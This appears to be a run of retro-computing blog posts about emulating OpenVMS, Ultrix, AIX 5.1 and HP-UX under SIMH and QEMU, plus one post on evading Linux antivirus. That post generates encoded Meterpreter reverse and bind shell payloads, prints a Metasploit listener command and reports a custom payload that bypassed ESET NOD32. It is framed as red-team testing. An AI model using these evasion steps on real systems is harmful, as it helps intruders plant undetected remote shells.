$ copy DOOM.EXE SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0]
$ set def SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0]

Following needs to be executed in the DW-MOTIF X11 windows 

$ doom :== $SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0]doom.exe

That is it and now you can enjoy some Doom on the OpenVMS AXP ;)

Huge thanks go to the original Doom porter Alexey Chupahin (SDL, SDL-mixer, Prboom patches)

Also thanks go to joukj@hrem.nano.tudelft.nl for providing his sets of great OpenVMS patches for SDL and SDL-mixer as well as PrBoom http://nchrem.tnw.tudelft.nl/openvms/software2.html

Not a long entry here, since all the hard work was already done by Darkstar @ http://gunkies.org/wiki/Installing_Ultrix_4.5_on_SIMH

I only wanted to add my additions (tun-tap networking and remote X11 DECwindows via Xephyr)

The main difference is the ultrix.ini configuration file, since we will be using tap0 and bridging and setting up masquerade on our Linux machine, below is my network.sh script that I run before the simh simulator starts

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
#brctl addif br0 tap0 vboxnet0 <-- add this if you wish to integrate with VirtualBox
brctl addif br0 tap0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Next is the ultrix.ini simh configuration file that I have used

; SimH 4.0 Configuration file for MicroVAX 3800
;
; Host System : DEC MicroVAX 3800
; Operating System : DEC Ultrix v4.5
; Memory : 64mb
; Network config : XQ: Ethernet, 08:00:2b:04:14:02
; Disks : RQ0: RA90, 1.2gb
; RQ1: RA90, 1.2gb
; CDROMs : RQ2: iso file
; Tape config : TQ0: TK50, 94mb
;

load -r ka655x.bin

; NVRAM
attach NVR nvram.bin

; CPU config
set CPU 64m
set CPU conhalt
set CPU idle=all

; configure console to 7-bit only
set TTO 7b
set TTI 7b

; Disk drives
set RQ0 ra90
attach RQ0 disk01.dd 
set RQ1 ra90
attach RQ1 disk02.dd 
set RQ2 CDROM
attach -r RQ2 ultrix.iso
set RQ3 dis

; Tape
set TQ tk50
;attach tq0 filename-to-tape-file
set TQ1 dis
set TQ2 dis
set TQ3 dis

; Disable unused peripherals
set CR dis
set RL dis
set TS dis

; Attach Ethernet to a network interface
set xq mac=08-00-2B-AA-BB-CC
attach xq tap:tap0

; boot the system
boot CPU

Explanation:

The ka620.bin is from here  https://github.com/simh/simh/raw/master/VAX/ka620.bin

The ultrix.iso is from here https://musall.de/mirrors/ultrix/ultrix_os/vax/ultrix-vax-4.5-mode1.ufs.bz2  Just bunzip2 and rename to ultrix.iso

The disk01.dd and disk02.dd are made like this

dd if=/dev/zero of=disk01.dd bs=1024 count=1M
dd if=/dev/zero of=disk02.dd bs=1024 count=1M

Installation

So one can pretty much follow 100% the steps in the http://gunkies.org/wiki/Installing_Ultrix_4.5_on_SIMH except in the following section where I have chosen DECwindows for OSF/Motif (1)

I have used slightly different network config because of the tap setup earlier so we will change this section accordingly

I have used these values

# ifconfig qe0 10.0.2.12 netmask 255.255.255.0 up
# route add default 10.0.2.2 1

Once we reboot and have everything working (network) we move on to configuring the DECwindows part. For this I have changed the following file in order to load DECwindows motif  /usr/lib/X11/xdm/Xsession

#!/bin/sh

exec > $HOME/.xsession-errors 2>&1

case $# in
1)
case $1 in
failsafe)
exec xterm -geometry 80x24-0-0
;;
esac
esac

startup=$HOME/.xsession
resources=$HOME/.Xresources

if [ -f $startup ]; then
exec $startup
else
if [ -f $resources ]; then
xrdb -load $resources
fi
exec /usr/bin/dxsession 
fi

Then I have created a symlink to xdm so I could call startx from root directly

# ln -s /usr/bin/X11/xdm /startx

Then if I wanted to run DECwindows just initiate startx

# ./startx

And on my Linux host I run Xephyr as follows

Xephyr -screen 980x640 -ac -query 10.0.2.12 :3

Which gives me a nice remote DECwindows environment to work with

There are some interesting VAX Ultrix resources still available online today like

https://musall.de/mirrors/ultrix/freeware/starfish.osfn.org/ultrix/ GCC 3.0.4 is there if you don’t like the DEC C compiler.

References:

http://gunkies.org/wiki/Installing_Ultrix_4.5_on_SIMH 
Stephen's Machine Room - https://www.youtube.com/watch?v=dwFnzGZBA6E
https://musall.de/mirrors/ultrix/freeware/

Well there are not many Linux antivirus solutions out there, but from the few I think Avast, Eset and Kaspersky are among the best out there. Purpose of this article is not to promote one product over the other, but rather use them in a live example testing that could be part of a Red-Team exercise (if they ever go this path of course) to prepare against potential Antivirus software and to know what will get flagged and what will pass (Metasploit/Meterpreter/Mettle)

So for the sake of this exercise I have created a simple shell script generator that will produce various encoded executable Linux payloads of interest, which we will upload to a Linux Virtual machine (Ubuntu 18.04 x86_64) and let the installed AV handle the findings. What would be left would be the pieces that would theoretically work and bypass the AV, so we will test a few examples to verify their functionality.

I have concentrated on mainly the Linux  x86 and x86_64 Meterpreter/Mettle payloads with various encoder combinations. The shell script generator includes variable names that can be changes to use a combination of ones liking and automating the process of generating the binaries.

Make sure you place the below script in your metasploit-framework path and make it executable. The generator script is residing here ->

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/AV-TEST-LINUX.sh

When running the script you should input the Metasploit-framework LISTENING IP address and TCP Port for example :

In our first test scenario, we will be using the Eset NOD32 4.0.90 on Ubuntu 18.04 (x86_64)

Next we shall have a list of generated test payloads that we will feed to the remote machine with the Linux AV via scp. In our test we have generated 47 executables.

-rw-r--r-- 1 root root 1102368 Apr 23 23:44 aarch64-reverse_tcp2.elf
-rw-r--r-- 1 root root     332 Apr 23 23:43 aarch64-reverse_tcp.elf
-rw-r--r-- 1 root root 1030664 Apr 23 23:44 armle-reverse_tcp2.elf
-rw-r--r-- 1 root root     464 Apr 23 23:44 mipsbe-reverse_tcp.elf
-rw-r--r-- 1 root root     464 Apr 23 23:44 mipsle-reverse_tcp.elf
-rw-r--r-- 1 root root     162 Apr 23 23:39 x64-exec.elf
-rw-r--r-- 1 root root     162 Apr 23 23:39 x64-exec-xor.elf
-rw-r--r-- 1 root root     198 Apr 23 23:39 x64-mt-bind_tcp.elf
-rw-r--r-- 1 root root     239 Apr 23 23:39 x64-mt-bind_tcp-xor.elf
-rw-r--r-- 1 root root 1046472 Apr 23 23:39 x64-mt-reverse_tcp2.elf
-rw-r--r-- 1 root root     249 Apr 23 23:38 x64-mt-reverse_tcp.elf
-rw-r--r-- 1 root root 1046631 Apr 23 23:39 x64-mt-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     295 Apr 23 23:38 x64-mt-reverse_tcp-xor.elf
-rw-r--r-- 1 root root 1046472 Apr 23 23:39 x64-mt-rev-http.elf
-rw-r--r-- 1 root root 1046472 Apr 23 23:40 x64-mt-rev-https.elf
-rw-r--r-- 1 root root 1046631 Apr 23 23:39 x64-mt-rev-https-xor.elf
-rw-r--r-- 1 root root 1046631 Apr 23 23:39 x64-mt-rev-http-xor.elf
-rw-r--r-- 1 root root     206 Apr 23 23:40 x64-sh-bind_tcp2.elf
-rw-r--r-- 1 root root     198 Apr 23 23:40 x64-sh-bind_tcp.elf
-rw-r--r-- 1 root root     247 Apr 23 23:40 x64-sh-bind_tcp-xor2.elf
-rw-r--r-- 1 root root     239 Apr 23 23:40 x64-sh-bind_tcp-xor.elf
-rw-r--r-- 1 root root     249 Apr 23 23:40 x64-sh-reverse.elf
-rw-r--r-- 1 root root     194 Apr 23 23:40 x64-sh-reverse_tcp2.elf
-rw-r--r-- 1 root root     239 Apr 23 23:40 x64-sh-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     295 Apr 23 23:40 x64-sh-reverse-xor.elf
-rw-r--r-- 1 root root     122 Apr 23 23:41 x86-exec.elf
-rw-r--r-- 1 root root     257 Apr 23 23:41 x86-exec-xor.elf
-rw-r--r-- 1 root root     194 Apr 23 23:42 x86-mt-bind_tcp.elf
-rw-r--r-- 1 root root     329 Apr 23 23:41 x86-mt-bind_tcp-xor.elf
-rw-r--r-- 1 root root 1107556 Apr 23 23:41 x86-mt-reverse_tcp2.elf
-rw-r--r-- 1 root root     207 Apr 23 23:41 x86-mt-reverse_tcp.elf
-rw-r--r-- 1 root root 1107790 Apr 23 23:41 x86-mt-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     342 Apr 23 23:41 x86-mt-reverse_tcp-xor.elf
-rw-r--r-- 1 root root     614 Apr 23 23:43 x86-mt-reverse_tcp-xor.elf.multi
-rw-r--r-- 1 root root 1107556 Apr 23 23:42 x86-mt-rev-http.elf
-rw-r--r-- 1 root root 1107556 Apr 23 23:42 x86-mt-rev-https.elf
-rw-r--r-- 1 root root 1107790 Apr 23 23:42 x86-mt-rev-https-xor.elf
-rw-r--r-- 1 root root 1107790 Apr 23 23:42 x86-mt-rev-http-xor.elf
-rw-r--r-- 1 root root     162 Apr 23 23:43 x86-sh-bind_tcp2.elf
-rw-r--r-- 1 root root     194 Apr 23 23:43 x86-sh-bind_tcp.elf
-rw-r--r-- 1 root root     297 Apr 23 23:43 x86-sh-bind_tcp-xor2.elf
-rw-r--r-- 1 root root     329 Apr 23 23:42 x86-sh-bind_tcp-xor.elf
-rw-r--r-- 1 root root     207 Apr 23 23:43 x86-sh-reverse.elf
-rw-r--r-- 1 root root     152 Apr 23 23:43 x86-sh-reverse_tcp2.elf
-rw-r--r-- 1 root root     287 Apr 23 23:43 x86-sh-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     342 Apr 23 23:43 x86-sh-reverse-xor.elf

So once we have uploaded them the AV kicks in and auto-removes most of them of course

Once the process finishes we see that there are a few files left intact, out of these some won’t work, but some will, which we will test next… we have 27 files left

Out of these, lets see the x86_64 ones that would be of interest to us since the VM runs 64bit

-rw-r--r-- 1 user user 162 Apr 23 22:08 x64-exec-xor.elf
-rw-r--r-- 1 user user 162 Apr 23 22:08 x64-exec.elf
-rw-r--r-- 1 user user 198 Apr 23 22:08 x64-mt-bind_tcp.elf
-rw-r--r-- 1 user user 1046631 Apr 23 22:08 x64-mt-rev-http-xor.elf
-rw-r--r-- 1 user user 1046631 Apr 23 22:08 x64-mt-rev-https-xor.elf
-rw-r--r-- 1 user user 1046631 Apr 23 22:08 x64-mt-reverse_tcp-xor2.elf
-rw-r--r-- 1 user user 198 Apr 23 22:08 x64-sh-bind_tcp.elf

We will configure our test LISTENER (place the below script in the metasploit-framework directory and make executable)

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/LISTENER-LINUX-METTLE.sh

(And adjust to the tested remote payloads ie change line 13 accordingly)

echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST ' > run.listener.sh

We need to modify the linux/x64/meterpreter/reverse_tcp to the corresponding payload in the LISTENER if we are going to verify anything apart from meterpreter/reverse_tcp

Will in this case become

echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter_reverse_tcp; set LHOST ' > run.listener.sh

The above will work with x64-mt-reverse_tcp-xor2.elf  since the platform is x64, and it is a meterpreter reverse tcp payload, so we will fire up our listener (please note the difference in the above 2 payloads !)

And execute the payload on the testing VM with Eset NOD32 AV and get a nice core-dumped message :)

So lets try other x86_64 ones with meterpreter/mettle we have next  to try -> x64-mt-bind_tcp.elf

So we adjust the LISTENER again this time with linux/x64/meterpreter/bind_tcp payload, this time however we need to add a remote IP for the bind_tcp to work (which kinda sucks) but we will test nevertheless, this time it works

But we want to have a working reverse meterpreter/mettle payload that bypasses Eset NOD32 !

So lets try some more custom code

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/LINUX-FORK-METTLE.sh

And upload the linux-payload to the VM with Nod32 and run the listener

Execute the linux-payload and … success we have bypassed the AV with custom reverse mettle payload :)

Did I mention that you can do the same for Windows PE32 ? No ? :) well now you know, it works just the same as on windows, and can be fully automated for AV evasion testing via the above scripts, scp, etc …

Shorter entry here which will be mostly copying Artyem  Trasenko’s blog here https://tyom.blogspot.com/2019/04/aixprep-under-qemu-how-to.html  

If you have never installed AIX before this howto would help you get going

Installing AIX on Qemu!

A small note on the networking – I have used the following values

en0        10.0.2.12  
gateway    10.0.2.2   
nameserver 8.8.8.8

I will just add my bits and pieces to get the part I have done and added to the experience. This guide will work also for AIX 4.4.3 but not anything newer than 5.1

One can get  the AIX 5.1 installation media (ISOs) from WinWorld archive here https://winworldpc.com/product/aix/51

You will probably only want CD1, CD2 and CD3

So once you have all in place you can use the following scripts to get networking done

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

And this  slightly modified /etc/qemu-ifup  (place it in /etc/qemu-ifup)

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
ip link set "$1" up
else
brctl=$(which brctl)
if [ ! "$ip" -o ! "$brctl" ]; then
echo "W: $0: not doing any bridge processing: neither ip nor brctl utility not found" >&2
exit 0
fi
ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
awk '/^default / {
for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
}'
)

switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
if [ -d /sys/class/net/$br/bridge/. ]; then
if [ -n "$ip" ]; then
ip link set "$1" master "$br"
else
brctl addif $br "$1"
fi
exit # exit with status of the previous command
fi
done

echo "W: $0: no bridge for guest interface found" >&2

Here is my loader script to make things easier

./qemu-system-ppc -m 192 -M 40p -bios q40pofw-serial.rom -serial telnet::4441,server -hda aix-hdd.qcow2 -cdrom ./cd.iso -net nic -net tap -vga none -nographic

So once we have AIX 5.1 installed we can start setting it up a little, I will include only short work-log notes I have made during my experimentation (which is still ongoing) so will probably add more as time goes by. I assume you have at least basic knowledge of some sort of UNIX environment.

You will need a good deal of additional software installed (I have used Michael Perzl’s legendary AIX Open Source Packages repo) from here -> http://www.perzl.org/aix/

To save some time I have collected all the needed RPMs (You will love the RPM dependency hell on these legacy UNIX systems, trust me) to my repository,  which can be downloaded from here http://45.76.81.249/AIX/aix-5.1/RPMs/ you should install all the RPMs from there. To transfer these packages to the emulated AIX 5.1 you can use ftp for example.

# rpm -Uvh name-or-package.rpm

To get a nice remote X11 desktop I use Xephyr (this will only work if your network is configured and works)

On AIX run 
# /usr/X11/bin/xdm

On Linux 
$ Xephyr -screen 980x640 -ac -query 10.0.2.12 :3

Compiling OpenSSH on AIX 5.1

Since AIX 5.1 does not have any kernel support for prng pseudodevices, there is no /dev/rand or /dev/urandom   So in order to compile OpenSSH we need to first download and build prngd

You can download it from my repo from  here http://45.76.81.249/AIX/aix-5.1/prngd-0.9.29.tar Or get it from Sourceforge project page https://sourceforge.net/projects/prngd/files/prngd/0.9.29/

ON AIX
Unpack the sources e.g.:

# gunzip -c prngd-0.9.29.tar.gz | tar xvf -
# cd prngd-0.9.29

Modify the Makefile according to the OS version:

# ln -s /usr/bin/gcc /usr/bin/cc

then build it

# gmake clean
# gmake

Install into some convenient directory, e.g.:

# cp contrib/AIX-4.3/prngd.conf.aix43 /etc/prngd.conf # entropy gathering commands
# cp in/prngd /usr/sbin/prngd

Configure it next  and create a subsystem:

# cat /var/adm/wtmp > /etc/prngd-seed # random seed
# mkssys -s prngd -p /usr/sbin/prngd -a '-f -c /etc/prngd.conf -s /etc/prngd-seed /dev/egd-pool' -u 0 -S -n 15 -f 9 -R -G local
# startsrc -s prngd

Add to /etc/rc.local:

startsrc -s prngd # start the subsystem on boot

Next we can download/compile OpenSSH , latest version that builds and works well is 6.9p1

https://openbsd.mirror.netelligent.ca/pub/OpenBSD/OpenSSH/portable/

OpenSSH 3.5p1 –> builds fine and works

# ./configure --with-prngd-socket=/dev/egd-pool
# gmake
# mkuser -m sshd
# gmake install

OpenSSH 4.9p1 — OK
OpenSSH 5.9p1 — OK
OpenSSH 6.9p1 — OK

# ./configure --with-prngd-socket=/dev/egd-pool
# gmake
# mkuser -m sshd
# gmake install
0509-150 Dependent module libcrypto.a(libcrypto.so.1.0.2) could not be loaded.
# ln -s /opt/freeware/lib/libcrypro.a /usr/lib
# gmake install

Next I have added some hints that migth get one going more

To get libm.a match libraries installed mount CD1 of AIX 5.1 and upload the bos.adt from CD1/intallp/ppc/bos.adt to the virtual AIX 5.1 and install it

# installp -acF -d . bos.adt

Additionally one can install more stuff like IBM C compilers and X11.motif X11.adt ..

# installp -acF -d . X11.adt 
# installp -acF -d . X11.motif

You can then do many things … one of the experients was compiling Prboom

You can try the binaries here http://45.76.81.249/AIX/aix-5.1/doom.tar

Latest Elinks 0.13 http://elinks.or.cz/download/elinks-current-0.13.tar.gz 

You can download the compiled RISC System/6000 binary+source here , just untar and gmake install   http://45.76.81.249/AIX/aix-5.1/elinks-0.13-20190426.tar

Latest stable PKGSRC Q1-2019 fails to bootstrap with the following error

To install CDE and run it instead of the boring mwm get the following packages from the CD1

Nice command to list last installed AIX packages via installp (from https://www.ibm.com/developerworks/community/blogs/brian/entry/how_to_show_most_recently_installed_filesets_on_aix?lang=en)

lslpp -qch | awk -F: '{printf "%-14s %-40s %-15s\n",$7,$2,$3}' |
sort | uniq | sed 's/70/-70/' | sort -t '/' -k 3,3n -k 1,1n -k 2,2n |
sed 's/-70/70/'

Here are the Dt relevant ones one needs

05/03/19 OpenGL.GL32.adt.demos 5.1.0.0 
05/03/19 OpenGL.GL32.adt.include 5.1.0.0 
05/03/19 OpenGL.GL32.adt.samples 5.1.0.0 
05/03/19 OpenGL.GL32.rte.base 5.1.0.0 
05/03/19 OpenGL.OpenGL_X.adt.include 5.1.0.25 
05/03/19 OpenGL.OpenGL_X.adt.samples 5.1.0.35 
05/03/19 OpenGL.OpenGL_X.dev.vfb 5.1.0.50 
05/03/19 OpenGL.OpenGL_X.rte.base 5.1.0.50 
05/03/19 OpenGL.OpenGL_X.rte.base+ 5.1.0.10 
05/03/19 OpenGL.OpenGL_X.rte.base_mp 5.1.0.10 
05/03/19 OpenGL.OpenGL_X.rte.pipe++ 5.1.0.35 
05/03/19 OpenGL.OpenGL_X.rte.pipe64++ 5.1.0.35 
05/03/19 OpenGL.OpenGL_X.rte.soft 5.1.0.50 
05/03/19 OpenGL.OpenGL_X.tools.base 5.1.0.0 
05/03/19 X11.adt.bitmaps 5.1.0.0 
05/03/19 X11.adt.ext 5.1.0.25 
05/03/19 X11.adt.imake 5.1.0.15 
05/03/19 X11.adt.include 5.1.0.0 
05/03/19 X11.adt.lib 5.1.0.0 
05/03/19 X11.adt.motif 5.1.0.0 
05/03/19 X11.vfb 5.1.0.15 
05/05/19 X11.Dt.ToolTalk 5.1.0.50 
05/05/19 X11.Dt.bitmaps 5.1.0.0 
05/05/19 X11.Dt.helpinfo 5.1.0.0 
05/05/19 X11.Dt.helpmin 5.1.0.0 
05/05/19 X11.Dt.helprun 5.1.0.0 
05/05/19 X11.Dt.lib 5.1.0.50 
05/05/19 X11.Dt.rte 5.1.0.50 
05/05/19 X11.apps.aixterm 5.1.0.35 
05/05/19 X11.apps.clients 5.1.0.0 
05/05/19 X11.apps.config 5.1.0.0 
05/05/19 X11.apps.custom 5.1.0.0 
05/05/19 X11.apps.msmit 5.1.0.50 
05/05/19 X11.apps.pm 5.1.0.0 
05/05/19 X11.apps.rte 5.1.0.0 
05/05/19 X11.apps.util 5.1.0.0 
05/05/19 X11.apps.xdm 5.1.0.25 
05/05/19 X11.apps.xterm 5.1.0.10 
05/05/19 X11.base.common 5.1.0.0 
05/05/19 X11.base.lib 5.1.0.50 
05/05/19 X11.base.rte 5.1.0.50 
05/05/19 X11.base.smt 5.1.0.25 
05/05/19 X11.fnt.Gr_Cyr_T1 5.1.0.0 
05/05/19 X11.fnt.coreX 5.1.0.0 
05/05/19 X11.fnt.defaultFonts 5.1.0.0 
05/05/19 X11.fnt.ibm1046 5.1.0.0 
05/05/19 X11.fnt.ibm1046_T1 5.1.0.0 
05/05/19 X11.fnt.iso1 5.1.0.25 
05/05/19 X11.fnt.iso2 5.1.0.0 
05/05/19 X11.fnt.iso3 5.1.0.0 
05/05/19 X11.fnt.iso4 5.1.0.0 
05/05/19 X11.fnt.iso5 5.1.0.0 
05/05/19 X11.fnt.iso7 5.1.0.0 
05/05/19 X11.fnt.iso8 5.1.0.0 
05/05/19 X11.fnt.iso8_T1 5.1.0.0 
05/05/19 X11.fnt.iso9 5.1.0.0 
05/05/19 X11.fnt.iso_T1 5.1.0.0 
05/05/19 X11.fnt.ksc5601.ttf 5.1.0.0 
05/05/19 X11.fnt.ucs.com 5.1.0.0 
05/05/19 X11.fnt.util 5.1.0.0 
05/05/19 X11.motif.lib 5.1.0.50 
05/05/19 X11.motif.mwm 5.1.0.35 
05/05/19 X11.vsm.lib 5.1.0.25 
05/05/19 bos.txt.bib 5.1.0.0 
05/05/19 bos.txt.bib.data 5.1.0.0 
05/05/19 bos.txt.hplj.fnt 5.1.0.0 
05/05/19 bos.txt.ibm3812.fnt 5.1.0.0 
05/05/19 bos.txt.ibm3816.fnt 5.1.0.0 
05/05/19 bos.txt.spell 5.1.0.0 
05/05/19 bos.txt.spell.data 5.1.0.0 
05/05/19 bos.txt.tfs 5.1.0.0 
05/05/19 bos.txt.tfs.data 5.1.0.0 
05/05/19 bos.txt.ts 5.1.0.35 
05/05/19 xlC.aix50.rte 5.0.2.2 
05/05/19 xlC.cpp 5.0.2.0 
05/05/19 xlC.rte 5.0.2.1

Once we have these on place we create a backup of a few files

# mv /usr/lib/X11/xdm/Xsession  /usr/lib/X11/xdm/Xsession.mwm
# cp /usr/dt/bin/Xsession /usr/dt/bin/Xsession.cde


Now the CDE (dt) Xsession has some strange keboard configurations that 
will effectively mess up the CDE session if you would want to use 
the keyboard (which we want) so I have modified it a little and uploaded 
to my site which you can get here 

http://45.76.81.249/AIX/aix-5.1/Xsession.cde

# cp Xsession.cde /usr/lib/X11/Xsession 
# /usr/bin/X11/xdm

And on the Linux machine that runs qemu-system-ppc 

$ Xephyr -screen 980x640 -ac -query 10.0.2.12 :3

We get a nice CDE desktop finally

Be patient, full CDE takes about 1 minute to load

Last of the major commercial UNIX systems that I wanted to see emulated is the legendary HP-UX (Hewlett Packard Unix)  (more information on the Wikipedia https://en.wikipedia.org/wiki/HP-UX )  And since last week we had the Gregorian Calendar Easter and today we have the Julian Calendar Easter it is a symbolic Resurrection  of HP-UX

The emulated machine is a HP B160L desktop machine

It was quite a surprise when I noticed  Sven Schnelle (https://github.com/svenschnelle) mention that HP-UX now runs under qemu-system-hppa, so I wanted to test and try it of course.

https://parisc.wiki.kernel.org/index.php/Qemu

I am running all my emulation experiments solely on Linux x86_64 (Linux Mint 19.1) and all the networking support is strictly Linux only so if you wish to reproduce this on macOS or Windows you are on your own there.

I have git-cloned recent qemu from ( https://github.com/qemu/qemu)  and built only the  hppa emulation (you can build the whole thing of course)

$ mkdir -p $HOME/KVM/HPUX
$ cd $HOME/KVM/HPUX
$ git clone https://github.com/qemu/qemu.git
$ cd qemu 
$ ./configure --target-list=hppa-softmmu
$ make 

Copy the compiled qemu-system-hppa binary to your working directory

$ cd $HOME/KVM/HPUX
$./qemu-system-hppa --version 
QEMU emulator version 3.1.93 (v4.0.0-rc3-4-g13c24edaa7-dirty)
Copyright (c) 2003-2019 Fabrice Bellard and the QEMU Project developers

So now we are almost ready with the installation, but before that we need to make sure a couple of per-requisites are met. Main thing is of course the installation media which was ( HP-UX B.11.11) found in the deep corners of the internet ..

CD1 https://drop.me/MY0mqq
CD2 https://drop.me/MzP4Ry
CD3 https://drop.me/opL13Z
CD4 https://drop.me/M0yxgZ

For the conveniences sake I have called the HP-UX 11.11 ISOs as follows (place them in your working directory that holds qemu-system-hppa binary as well as the disk images, etc)

-rw-rw-r-- 1 user user 642865152 Apr 28 00:43 hpux11-01.iso
-rw-rw-r-- 1 user user 357793792 Apr 28 00:51 hpux11-02.iso
-rw-rw-r-- 1 user user 648380416 Apr 28 00:57 hpux11-03.iso
-rw-rw-r-- 1 user user 309100544 Apr 28 00:55 hpux11-04.iso

Next we need to make sure the qemu networking is setup (tun/tap and bridge)  Below is my network sharing script one needs to execute under root prior the emulation

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Note:Seems that networking support is not implemented yet in qemu-system-hpp following is in the to-do list  (https://parisc.wiki.kernel.org/index.php/Qemu )

• Emulate Lasi (i82596) and Tulip (DEC 21×40) network cards in Qemu

Next make sure you have the following /etc/qemu-ifup  script in place

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
ip link set "$1" up
else
brctl=$(which brctl)
if [ ! "$ip" -o ! "$brctl" ]; then
echo "W: $0: not doing any bridge processing: neither ip nor brctl utility not found" >&2
exit 0
fi
ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
awk '/^default / {
for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
}'
)

switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
if [ -d /sys/class/net/$br/bridge/. ]; then
if [ -n "$ip" ]; then
ip link set "$1" master "$br"
else
brctl addif $br "$1"
fi
exit # exit with status of the previous command
fi
done

echo "W: $0: no bridge for guest interface found" >&2

Next we need to define a disk image (HP-UX 11.11 will need a full raw disk image, default qemu-img create -f qcow2 hpux.img 8G will NOT WORK !)

$ cd $HOME/KVM/HPUX
$ dd if=/dev/zero of=hpux.img bs=1024 count=8M

Next we define the HP-UX installation loader script to make things easier

$ cd $HOME/KVM/HPUX
./qemu-system-hppa -boot d -serial telnet::4441,server -drive if=scsi,bus=0,index=6,file=./hpux.img,format=raw -serial mon:stdio -D /tmp/foo -nographic -m 512 -d nochain -cdrom ./hpux11-01.iso -D /tmp/foo -net nic -net tap

OK So we are almost ready, but just one last thing before we fire up the installation (We all love green don’t we ?) get yourself the super cool retro-terminal from here https://github.com/Swordfish90/cool-retro-term  Im using it in my examples below in case you wonder from where the screenshots come from ( Remember the good old terminal days when things seemed simple ?)

So lets start the HP-UX 11.11 emulation now

root@panasonic:/home/user/KVM/HPUX/HP-UX-11.11# ./install.sh 
qemu-system-hppa: -serial telnet::4441,server: info: QEMU waiting for connection on: disconnected:telnet:0.0.0.0:4441,server
QEMU 3.1.93 monitor - type 'help' for more information
(qemu)

You need to connect to the qemu telnet server via a good terminal emulator (retro-terminal is quite good)

$ telnet localhost 4441

After a shor time you will get kicked into the installation menu if all went right

Select Additional Software what you want to get installed (mind we only created 8GB disk)

Now we need patiance, since it can take some time (1hr – 2 hrs depending on what we chose to install)  to finsh.

Eventually it will finish

We will need to provide a CD2 installation image now

(qemu) change scsi0-cd2 ./hpux11-02.iso

The installer will continue now

Sweet CDE installing now

Once the CD2 finishes we get instructed to insert CD3

(qemu) change scsi0-cd2 ./hpux11-03.is

And the installer will continue

Yet again we get promped for the last CD4

(qemu) change scsi0-cd2 ./hpux11-04.iso

And the installer will continue again

And finally it will FINISH !

We will need to change the loader script for qemu-system-hppa to tell it to boot the new disk instead of the CD

./qemu-system-hppa -boot c -serial telnet::4441,server -drive if=scsi,bus=0,index=6,file=./hpux.img,format=raw -serial mon:stdio -D /tmp/foo -nographic -m 512 -d nochain -cdrom ./hpux11-01.iso -D /tmp/foo -net nic -net tap

Now again this will take some time to get through first boot; populating /dev/; setting up post-installation scripts etc .. so be patient

Note that the setup-process will take long to process CIM Repository ( This is something that is observed by others on real HW HP-UXes ( https://community.hpe.com/t5/Server-Management-Systems/Why-does-it-take-so-long-to-build-the-CIM-repository-on-HPUX/td-p/4931711)   You can just CTRL+C if you don’t want to wait – I did

It will shortly go for shutdown procedure (with a nasty FAILURE message since we broke the CIM Repository setup) but it does not matter, just load the simulation again

./qemu-system-hppa -boot c -serial telnet::4441,server -drive if=scsi,bus=0,index=6,file=./hpux.img,format=raw -serial mon:stdio -D /tmp/foo -nographic -m 512 -d nochain -cdrom ./hpux11-01.iso -D /tmp/foo -net nic -net tap

This time it will start booting properly

And we will be greeted with System options menu to configure (GeoCustoms)

Finally we land up in network configuration menu

Press [y]

Choose [n] since we will setup networking manually

Choose [y]

Choose hostname : UNIX    (feel free to experiment here, but there are some pretty wild rules for defining 8char$  max hostname)

Setup your time zones, root password..

Next we setup our IP – I have used 10.0.2.12 and define subnet and gateway IP  (IT WILL FAIL TO VERIFY)

Setup other networking parts

NETWORK WILL FAIL TO VERIFY

And finally it will continue booting ….

I guess some work after login needs these to address (networking)

Configure LAN interfaces …………………………………….. FAIL *
Starting HP-UX Secure Shell ………………………………….. FAIL *

Finally we land up in a root shell

# uname -a
HP-UX UNIX B.11.11 U 9000/778 2006243326 unlimited-user license
# 

And it looks like networking is not yet supported under qemu-system-hppa
https://parisc.wiki.kernel.org/index.php/Qemu

